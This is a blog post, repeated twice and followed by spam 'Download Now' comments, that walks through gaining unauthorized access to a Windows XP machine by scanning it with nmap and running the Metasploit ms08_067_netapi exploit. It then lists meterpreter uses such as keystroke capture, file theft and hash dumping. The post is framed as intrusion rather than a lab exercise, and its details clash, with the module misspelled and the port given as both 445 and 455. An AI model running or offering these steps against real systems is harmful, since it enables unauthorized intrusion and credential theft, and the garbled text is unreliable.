This guide will be show you how to get unauthorized access to a Windows Xp machine by its I.P. address using Backtrack 5.
Start here :
1. Scan the target machine's open ports using nmap
command : nmap -T4 -A -v [target ip address]
where 135, 139,445 are the open ports.
2.Then start the msfconsole, which will appear on Applications>backtrack>Exploitation Tools>Network Exploitation Tools>Metasploit Framework>msfconsole
or open the shell and type "msfconsole"
3.In msfconsole type 'use exploit/windows/smb/ms08_67_netapi' & hit enter.
4.Then type 'show options' & hit enter.
The 'show options' cammand will shows the exploit Module options.This exploit's there are three options :
----------------------------------------------------------------------------------------------------------
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
----------------------------------------------------------------------------------------------------------
the first option is RHOST which state the target ip address. To set the target ip address type
'set RHOST [target ip]'
command : set RHOST 192.168.1.11
The second option is RPORT which state the target open ports. & the 455 is its default port.to see your settings type 'show options' again & hit enter.
5. Then the last step is Type 'exploit' & hit enter.
thats it !! we will sucessfully exploited the windows xp.Now we have a meterpreter session, which is a Payload used by the exploit.In meterpreter session we will do a lot of things like capturing keystrocks, take screenshot, get commond promt, upload & download files, get hashs etc.To see all options type 'help' & hit enter.
some commonds are :
System information :
To get the commond promt type 'shell' & hit enter.
Thanks For visiting.!!
Start here :
1. Scan the target machine's open ports using nmap
command : nmap -T4 -A -v [target ip address]
where 135, 139,445 are the open ports.
2.Then start the msfconsole, which will appear on Applications>backtrack>Exploitation Tools>Network Exploitation Tools>Metasploit Framework>msfconsole
or open the shell and type "msfconsole"
3.In msfconsole type 'use exploit/windows/smb/ms08_67_netapi' & hit enter.
4.Then type 'show options' & hit enter.
The 'show options' cammand will shows the exploit Module options.This exploit's there are three options :
----------------------------------------------------------------------------------------------------------
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
----------------------------------------------------------------------------------------------------------
the first option is RHOST which state the target ip address. To set the target ip address type
'set RHOST [target ip]'
command : set RHOST 192.168.1.11
The second option is RPORT which state the target open ports. & the 455 is its default port.to see your settings type 'show options' again & hit enter.
5. Then the last step is Type 'exploit' & hit enter.
thats it !! we will sucessfully exploited the windows xp.Now we have a meterpreter session, which is a Payload used by the exploit.In meterpreter session we will do a lot of things like capturing keystrocks, take screenshot, get commond promt, upload & download files, get hashs etc.To see all options type 'help' & hit enter.
some commonds are :
System information :
To get the commond promt type 'shell' & hit enter.
Thanks For visiting.!!
Hck4Fun: Hacking Windows Xp With I.P. Address Using Backtrack 5 >>>>> Download Now
ReplyDelete>>>>> Download Full
Hck4Fun: Hacking Windows Xp With I.P. Address Using Backtrack 5 >>>>> Download LINK
>>>>> Download Now
Hck4Fun: Hacking Windows Xp With I.P. Address Using Backtrack 5 >>>>> Download Full
>>>>> Download LINK